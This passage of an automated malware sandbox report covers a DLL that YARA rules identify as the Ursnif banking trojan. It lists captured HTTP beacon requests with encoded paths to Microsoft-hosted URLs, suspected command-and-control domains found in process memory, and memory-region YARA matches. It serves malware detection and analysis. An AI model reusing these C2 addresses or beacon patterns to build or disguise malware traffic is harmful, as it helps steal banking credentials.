                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: f95b0919-28f4-47a7-648d-aec4a884b896Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6PR07CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COMX-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1X-FEServer: DB6PR07CA0023X-Powered-By: ASP.NETX-FEServer: AM5P194CA0003Date: Mon, 11 Oct 2021 22:51:28 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: PR3P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1X-FEServer: PR3P195CA0027X-Powered-By: ASP.NETX-FEServer: AM5P194CA0015Date: Mon, 11 Oct 2021 22:51:42 GMTConnection: close
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.531474027.0000000005282000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.538526774.0000000004C33000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.549834890.00000000047C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: rundll32.exe, 00000006.00000002.681813833.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://areuranel.website/
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website/V
                      Source: loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_2
                      Source: loaddll32.exe, 00000002.00000002.678292868.0000000000C70000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrc
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: rundll32.exe, 00000006.00000003.625046628.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/
                      Source: loaddll32.exe, 00000002.00000003.593466694.0000000000C84000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gw
                      Source: rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1633992647&amp;rver
                      Source: rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1633992660&amp;rver
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;
                      Source: loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/H
                      Source: loaddll32.exe, 00000002.00000003.590802963.0000000000CD4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/&/
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com///
                      Source: rundll32.exe, 00000006.00000003.668405116.0000000003688000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.624862887.0000000003690000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZw
                      Source: loaddll32.exe, 00000002.00000003.593344627.0000000000CDA000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.593269471.0000000000CDC000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQ
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch&quot;
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534697625.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: loaddll32.exe, 00000002.00000002.678162514.0000000000C62000.00000004.00000020.sdmpString found in binary or memory: https://wweuranel.website/
                      Source: rundll32.exe, 00000006.00000003.535020044.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/
                      Source: rundll32.exe, 00000006.00000003.535020044.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/7arS2
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fVn4JvoFId6Cp3NLYZ%2fukfCWWcxchPj%2fqCUcA7g4p8o%2fIzq
                      Source: rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fiPe0RJr3YRoIqgJZ%2fbp29G1GzQQlGJM_%2f2FuLuVprzaPw0SE
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch&quot;
                      Source: loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBB
                      Source: rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7Ct
                      Source: rundll32.exe, 00000006.00000003.624898872.000000000368B000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara match | File source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
